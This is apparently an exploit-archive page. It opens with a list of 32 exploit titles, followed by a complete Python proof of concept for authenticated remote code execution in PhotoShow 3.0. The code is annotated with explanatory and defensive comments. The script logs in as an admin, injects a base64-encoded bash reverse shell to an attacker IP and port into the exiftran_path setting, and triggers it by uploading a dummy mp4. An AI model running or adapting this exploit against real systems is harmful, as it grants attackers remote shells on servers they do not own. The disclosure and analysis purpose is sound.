
32 changes to exploits/shellcodes/ghdb Answerdev 1.0.3 - Account Takeover D-Link DIR-846 - Remote Command Execution (RCE) vulnerability Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure SOUND4 LinkAndShare Transmitter 1.1.2 - Format String Stack Buffer Overflow ERPNext 12.29 - Cross-Site Scripting (XSS) Liferay Portal 6.2.5 - Insecure Permissions GNU screen v4.9.0 - Privilege Escalation Apache Tomcat 10.1 - Denial Of Service PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated) BTCPay Server v1.7.4 - HTML Injection. Provide Server v.14.4 XSS - CSRF & Remote Code Execution (RCE) Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS) ImageMagick 7.1.0-49 - DoS bgERP v22.31 (Orlovets) - Cookie Session vulnerability & Cross-Site Scripting (XSS) Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS) Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS) CKEditor 5 35.4.0 - Cross-Site Scripting (XSS) Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE) Froxlor 2.0.3 Stable - Remote Code Execution (RCE) ImageMagick 7.1.0-49 - Arbitrary File Read itech TrainSmart r1044 - SQL injection Online Eyewear Shop 1.0 - SQL Injection (Unauthenticated) PhotoShow 3.0 - Remote Code Execution projectSend r1605 - Remote Code Exectution RCE Responsive FileManager 9.9.5 - Remote Code Execution (RCE) zstore 6.6.0 - Cross-Site Scripting (XSS) Binwalk v2.3.2 - Remote Command Execution (RCE) XWorm Trojan 2.1 - Null Pointer Derefernce DoS Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution) Linux/x86_64 - bash Shellcode with xor encoding
# Exploit Title: PhotoShow 3.0 - Remote Code Execution
# Date: January 11, 2023
# Exploit Author: LSCP Responsible Disclosure Lab
# Detailed Bug Description: https://lscp.llc/index.php/2021/07/19/how-white-box-hacking-works-remote-code-execution-and-stored-xss-in-photoshow-3-0/
# Vendor Homepage: https://github.com/thibaud-rohmer
# Software Link: https://github.com/thibaud-rohmer/PhotoShow
# Version: 3.0
# Tested on: Ubuntu 20.04 LTS
# creds of a user with admin privileges required
import sys
import requests
import base64
import urllib.parse
# Argument check: exactly five positional values are required (script name
# makes six entries in sys.argv). Anything else prints usage and exits.
if(len(sys.argv)!=6):
    print('Usage: \n\tpython3 ' + sys.argv[0] + ' "login" ' +
    '"password" "target_ip" "attacker_ip" "attacker_nc_port"')
    quit()
# Positional arguments, kept as module-level globals. Note that main() passes
# them explicitly to the helpers, but createInjection() ends up reading the
# global attackerIp directly because its own parameter is spelled differently.
login=sys.argv[1]
password=sys.argv[2]
# Host or IP of the PhotoShow instance; every URL below is built as http://<targetIp>/...
targetIp = sys.argv[3]
# Where the injected command connects back to (host and TCP port, both as strings).
attackerIp = sys.argv[4]
attackerNcPort = sys.argv[5]
def main():
    """Run the three-step proof of concept against the configured target.

    Steps: authenticate, store a tampered value in the admin settings, then
    upload a dummy video so the application processes it. Reads the module
    globals parsed from argv; returns nothing and does not verify success
    beyond printing a reminder.
    """
    session = requests.Session()
    # Step 1: log in with the admin credentials (the header notes these are required).
    logInSession(session, targetIp, login, password)
    # Step 2: change the application's video-handling settings so that the
    # exiftran_path field carries a shell command instead of a path.
    uploadExpoit(session, targetIp, attackerIp, attackerNcPort)
    # Step 3: upload an .mp4; per the original author's notes this is what makes
    # the application act on the stored setting and connect back to the listener.
    sendMP4Video(session, targetIp)
    print("Check your netcat")
def logInSession(session, targetIp, login, password):
    """POST the login form and pin the returned session cookie on the session.

    Args:
        session: shared requests.Session used for every later request.
        targetIp: host/IP the URLs are built from.
        login, password: admin credentials.

    Raises:
        AttributeError: if the response has no Set-Cookie header (for example
            on a failed login), because the header is split unconditionally.
    """
    session.headers.update({'Content-Type' : "application/x-www-form-urlencoded"})
    # Credentials are concatenated raw, not URL-encoded, so values containing
    # '&' or '=' would be mis-parsed by the server.
    data = "login="+login+"&password="+password
    url = "http://"+targetIp+"/?t=Login"
    response= session.post(url, data=data)
    # Keep only the first "name=value" pair of Set-Cookie and send it as an
    # explicit Cookie header. requests.Session already persists cookies from
    # responses, so this manual copy is redundant but harmless.
    phpsessid=response.headers.get("Set-Cookie").split(";")[0]
    session.headers.update({'Cookie' : phpsessid})
def uploadExpoit(session, targetIp, attackerIp, attackerNcPort):
    """Submit the admin settings form with a tampered ``exiftran_path`` field.

    Every other setting is sent with a plausible default so the form is
    accepted; only the last fragment (from createInjection) is malicious.
    The response body is decoded and then discarded, so success is not
    checked here. The Content-Type set in logInSession is still active on
    the session, which is what this form-encoded body relies on.
    """
    exiftranPathInjection=createInjection(attackerIp, attackerNcPort)
    url = "http://"+targetIp+"/?t=Adm&a=Set"
    data = "name=PhotoShow&site_address=&loc=default.ini&user_theme=Default&" \
    + "rss=on&max_comments=50&thumbs_size=200&fbappid=&ffmpeg_path=&encode_video=on&"\
    + "ffmpeg_option=-threads+4+-vcodec+libx264+-acodec+libfdk_aac&rotate_image=on&"\
    + exiftranPathInjection
    # Defender's note: on the wire this is an authenticated POST to ?t=Adm&a=Set
    # whose exiftran_path value contains shell separators; that is the
    # observable signature. The root cause is presumably the application
    # handing this configured path to a shell instead of treating it as an
    # opaque filename — see the "Detailed Bug Description" link in the header.
    session.post(url, data=data).content.decode('utf8')
def createInjection(attakerIp, attackerNcPort):
    """Return the URL-encoded ``exiftran_path=...`` fragment for the settings form.

    NOTE(review): the first parameter is spelled ``attakerIp`` while the body
    reads ``attackerIp``; that name resolves to the module-level global parsed
    from argv, so the value the caller passes in is silently ignored. It only
    works because both happen to be the same string.
    """
    # The command is base64-encoded so the stored setting only has to carry
    # printable characters; it is decoded again on the target.
    textToEncode = "bash -i >& /dev/tcp/"+attackerIp+"/"+attackerNcPort+" 0>&1"
    b64Encoded = base64.b64encode(textToEncode.encode("ascii"))
    # str() of a bytes object yields "b'...'", so the slice below strips the
    # leading b' and the trailing '. (b64Encoded.decode("ascii") is the direct form.)
    strb64 = str(b64Encoded)
    strb64 = strb64[2:len(strb64)-1]
    # This is the injection itself: shell metacharacters (';', '|', '>') in a
    # field the application expects to hold a filesystem path. urlencode()
    # percent-encodes them for transport; they are intact once decoded server-side.
    injection = {"exiftran_path":"echo "+ strb64 +" | base64 -d > /tmp/1.sh ;/bin/bash /tmp/1.sh"}
    return urllib.parse.urlencode(injection)
def sendMP4Video(session, targetIp):
    """Upload a one-byte file named ``a.mp4`` to make the application process a video.

    The multipart body is hand-built with a fixed boundary and the matching
    Content-Type is set on the session (rather than using requests' ``files=``).
    The POST runs with a 1 ms timeout and ReadTimeout is swallowed — presumably
    because the server does not answer while the injected command is running.
    Only ReadTimeout is caught; the same 1 ms budget also applies to the
    connect phase, so a ConnectTimeout would propagate to the caller.
    """
    session.headers.update({'Content-Type' : "multipart/form-data; "\
    +"boundary=---------------------------752343701418612422363028651"})
    url = "http://"+targetIp+"/?a=Upl"
    # Three parts: empty "path", "inherit"=1, and the "images[]" file whose
    # content is the single byte 'a'. Each line ends in CR+LF as multipart requires.
    data = """-----------------------------752343701418612422363028651\r
Content-Disposition: form-data; name="path"\r
\r
\r
-----------------------------752343701418612422363028651\r
Content-Disposition: form-data; name="inherit"\r
\r
1\r
-----------------------------752343701418612422363028651\r
Content-Disposition: form-data; name="images[]"; filename="a.mp4"\r
Content-Type: video/mp4\r
\r
a\r
-----------------------------752343701418612422363028651--\r
"""
    try:
        session.post(url, data=data, timeout=0.001)
    except requests.exceptions.ReadTimeout:
        # Expected: the request is fire-and-forget, the response is never read.
        pass
# Script entry point; the argv check and global assignments above have already
# run by the time this executes.
if __name__ =="__main__":
    main()